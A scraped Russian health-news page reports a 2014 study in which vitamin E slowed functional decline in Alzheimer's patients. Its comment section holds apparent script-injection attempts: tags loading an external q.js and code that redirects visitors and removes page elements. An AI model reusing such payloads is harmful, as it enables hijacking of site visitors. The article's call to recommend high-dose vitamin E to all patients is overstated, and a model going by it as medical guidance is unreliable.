Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Обычная витаминка против ...  >>  Обычная витаминка против старости!
 
Обратная связь
 

Обычная витаминка против старости!

Размер шрифта
14 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из США обнаружили новые удивительные свойства витамина Е.

Обычная витаминка против старости!

Миллионы людей по всему миру страдают старческим слабоумием (болезнью Альцгеймера). Этот недуг не только безжалостно растаптывает качество жизни человека, но и наносит колоссальный ущерб экономике. Связано это с тем, что не существует по-настоящему эффективного средства лечения этого заболевания. Именно поэтому к болезни Альцгеймера приковано внимание всего научного мира: по количеству публикуемых исследований эта тема является, пожалуй, одной из лидирующих.

Одна из последних научных работ касается применения альфа-токоферола – одного из жирорастворимых витаминов группы E, который обладает мощными антиоксидантными свойствами. Авторы работали с группой пациентов с болезнью Альцгеймера в количестве 613 человек. Они были разделены на две группы: пациенты из первой принимали витамин Е в дозировке 2 000 МЕ/сутки, а из второй – препарат-плацебо.

Ученые обнаружили, что этот обычный витамин может замедлять прогрессирование функциональных нарушений (к ним относятся, например, проблемы с выполнением простейших бытовых действий, таких как: посещение магазинов, приготовление пищи и так далее) при болезни Альцгеймера легкой и средней степени тяжести. К сожалению, позитивное влияние витамина на память и когнитивные (познавательные) функции не было выявлено в ходе исследования.

«С момента открытия препаратов из группы ингибиторв холинэстеразы, которые в данный момент являются ведущими в лечении болезни Альцгеймера легкой и средней степени тяжести, медицинская наука не смогла предложить этим несчастным людям практически ничего нового», – рассказывает Мэри Сано, кандидат медицинских наук, научный сотрудник университета Маунт Синай (США). «В ходе нашего исследования мы обнаружили, что витамин Е снижает скорость прогрессирования функциональных нарушений на 19% в год!»

Значимость этого открытия трудно переоценить, учитывая доступность и распространенность таблетированного витамина Е. Этот препарат можно за копейки купить в любой, даже в самой захолустной аптеке. Авторы убеждены, что альфа-токоферол можно и нужно и рекомендовать как средство вторичной профилактики всем пациентам с болезнью Альцгеймера.

Хотите дожить до глубокой старости в здравом уме и трезвой памяти? Ознакомьтесь с материалами нашего специального проекта «Как сохранить память», и вы узнаете, как это сделать!

Результаты научной работы были опубликованы в журнале Journal of the American Medical Association.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:52

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Арахис и линейка предскажут ваше будущее   Ваша печень сжирает ваш мозг   Горячий шоколад защищает мозг   Это просто забывчивость, а не болезнь. 5 признаков!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как сохранить память. Часть 2
Стали забывать? 5 признаков, что это серьезно
Проблемы, с которыми справится секс. Часть 4

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.